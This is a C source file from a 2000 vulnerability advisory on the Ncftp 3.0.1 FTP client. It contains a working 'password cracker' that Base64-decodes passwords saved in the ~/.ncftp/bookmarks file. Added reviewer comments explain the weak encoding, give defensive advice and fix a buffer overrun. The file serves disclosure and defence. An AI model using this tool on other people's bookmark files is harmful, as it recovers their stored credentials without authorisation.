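/*
 * Ncftp client Vulnerability
 *
 * Date:   16/08/2000
 * System: Ncftp 3.0.1 (and certainly [rest of this field is missing on the page])
 * Author: zorgon
 * Web:    http://www.nightbird.free.fr
 *
 * Excuse me for my poor english :)
 *
 * Description
 * -----------
 * Ncftp is, at its core, a very practical FTP client. Among its features,
 * it can create bookmarks for your accounts. For each bookmark it can record
 * the FTP server, the login and the password, which will be "encrypted" (if
 * you also decide to save the password). All of this is saved in the file
 * ~/.ncftp/bookmarks.
 *
 * The problem comes from the password encoding algorithm, which can be
 * broken.
 *
 * Exploit
 * -------
 */

/*
 * Ncftp password cracker
 * by zorgon
 * -- http://zorgon.freeshell.org --
 *
 * Compile: gcc -o cracknctp crackncftp.c -Wall
 *
 * Note: you don't need the string "*encoded*"
 * of the encrypted password in the file
 * ~/.ncftp/bookmarks
 *
 */

/*
 * Reviewer notes (defensive reading of this listing):
 *
 * - The lookup table below is a plain Base64 alphabet (A-Z, a-z, 0-9, '+',
 *   '/'), and Decode() uses nothing but that table. No key or secret takes
 *   part, so the stored bookmark password is encoded, not encrypted: anyone
 *   who can read the bookmarks file can recover it.
 * - Practical consequence: treat ~/.ncftp/bookmarks as a plaintext credential
 *   store. Do not save passwords in bookmarks, keep the file readable by its
 *   owner only, and change any password that was saved there if the file (or
 *   a backup of it) may have been read by someone else.
 * - The value is taken from argv[1], so it ends up in shell history and is
 *   visible in the process list while the program runs.
 * - The header names after "#include" were lost on the page; the three
 *   headers below are the ones the code needs (fprintf/printf, malloc/free,
 *   strlen).
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void Decode(void *, const void *, size_t, int);

/*
 * Maps an input byte to its 6-bit Base64 value. Bytes outside the alphabet
 * map to 0177 and '=' maps to 0100; Decode() does not treat either specially.
 */
static const unsigned char B64DecodeTable[256] =
{
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 000-007 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 010-017 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 020-027 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 030-037 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 040-047 */
	'\177', '\177', '\177', '\76', '\177', '\177', '\177', '\77',	/* 050-057 */
	'\64', '\65', '\66', '\67', '\70', '\71', '\72', '\73',	/* 060-067 */
	'\74', '\75', '\177', '\177', '\177', '\100', '\177', '\177',	/* 070-077 */
	'\177', '\0', '\1', '\2', '\3', '\4', '\5', '\6',	/* 100-107 */
	'\7', '\10', '\11', '\12', '\13', '\14', '\15', '\16',	/* 110-117 */
	'\17', '\20', '\21', '\22', '\23', '\24', '\25', '\26',	/* 120-127 */
	'\27', '\30', '\31', '\177', '\177', '\177', '\177', '\177',	/* 130-137 */
	'\177', '\32', '\33', '\34', '\35', '\36', '\37', '\40',	/* 140-147 */
	'\41', '\42', '\43', '\44', '\45', '\46', '\47', '\50',	/* 150-157 */
	'\51', '\52', '\53', '\54', '\55', '\56', '\57', '\60',	/* 160-167 */
	'\61', '\62', '\63', '\177', '\177', '\177', '\177', '\177',	/* 170-177 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 200-207 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 210-217 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 220-227 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 230-237 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 240-247 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 250-257 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 260-267 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 270-277 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 300-307 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 310-317 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 320-327 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 330-337 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 340-347 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 350-357 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 360-367 */
	'\177', '\177', '\177', '\177', '\177', '\177', '\177', '\177',	/* 370-377 */
};

/* Print the program banner on stdout. */
void banner(void)
{
	/*
	 * The text after "by" is missing on the page (it looks like an
	 * angle-bracketed token was stripped); the author name is taken from
	 * the header comment above.
	 */
	fprintf(stdout, "Ncftp password cracker by zorgon\n");
	fprintf(stdout, "--- http://www.nightbird.free.fr --- \n\n");
}

/* Print a one-line usage message on stderr; cmd is the program name. */
void usage(const char *cmd)
{
	/* The argument placeholder was lost on the page; restored here. */
	fprintf(stderr, "Usage: %s <encoded-password>\n", cmd);
}

/*
 * Decode the encoded bookmark password given as argv[1] and print both forms.
 *
 * Returns 0 on success and 1 on a usage error or allocation failure.
 */
int main(int argc, char *argv[])
{
	const char *cryptpass;
	char *pass;
	size_t enc_len;
	size_t dec_cap;

	banner();
	if (argc < 2) {
		usage((argc > 0 && argv[0] != NULL) ? argv[0] : "crackncftp");
		return 1;
	}

	cryptpass = argv[1];
	enc_len = strlen(cryptpass);

	/*
	 * Decode() writes 3 bytes for every started group of 4 input bytes,
	 * plus the terminator. The original used a fixed char pass[128], which
	 * a long argument overruns on the stack, so the output buffer is sized
	 * from the input instead.
	 */
	dec_cap = (enc_len / 4 + (enc_len % 4 != 0)) * 3 + 1;
	pass = malloc(dec_cap);
	if (pass == NULL) {
		fprintf(stderr, "out of memory\n");
		return 1;
	}

	Decode(pass, cryptpass, enc_len, 1);
	printf("Password Encrypted: %s\n", cryptpass);
	printf("Password Decrypted: %s\n", pass);

	free(pass);
	return 0;
}

/*
 * Base64-decode n bytes from src0 into dst0.
 *
 * dst0      output buffer; the caller must provide at least
 *           3 * ceil(n / 4) bytes, plus one more when terminate != 0.
 *           Nothing in this function checks that size.
 * src0      encoded input, not required to be NUL-terminated.
 * n         number of input bytes to consume.
 * terminate when non-zero, a '\0' is written after the decoded bytes.
 *
 * There is no input validation: bytes outside the Base64 alphabet (0177 in
 * the table) and '=' (0100) are merged into the output as-is, and when the
 * input ends inside a group the missing positions are looked up as byte 0,
 * which the table also maps to 0177. Such input yields meaningless bytes
 * rather than an error.
 */
void Decode(void *dst0, const void *src0, size_t n, int terminate)
{
	unsigned char *dst = dst0;
	const unsigned char *src = src0;
	unsigned int c0, c1, c2, c3;

	if (dst == NULL)
		return;

	if (src != NULL) {
		const unsigned char *srclim = src + n;

		while (src < srclim) {
			/* Take up to four input bytes; absent ones become 0. */
			c0 = *src++;
			c1 = (src < srclim) ? *src++ : 0;
			c2 = (src < srclim) ? *src++ : 0;
			c3 = (src < srclim) ? *src++ : 0;

			/* Repack four 6-bit values into three 8-bit bytes. */
			dst[0] = (unsigned char) ((((unsigned int) B64DecodeTable[c0]) << 2) |
						  (((unsigned int) B64DecodeTable[c1]) >> 4));
			dst[1] = (unsigned char) ((((unsigned int) B64DecodeTable[c1]) << 4) |
						  (((unsigned int) B64DecodeTable[c2]) >> 2));
			dst[2] = (unsigned char) ((((unsigned int) B64DecodeTable[c2]) << 6) |
						  (((unsigned int) B64DecodeTable[c3])));
			dst += 3;
		}
	}

	if (terminate != 0)
		*dst = '\0';
}

/*
 * -------
 * ==================================
 * zorgon
 * http://www.nightbird.fr.st
 */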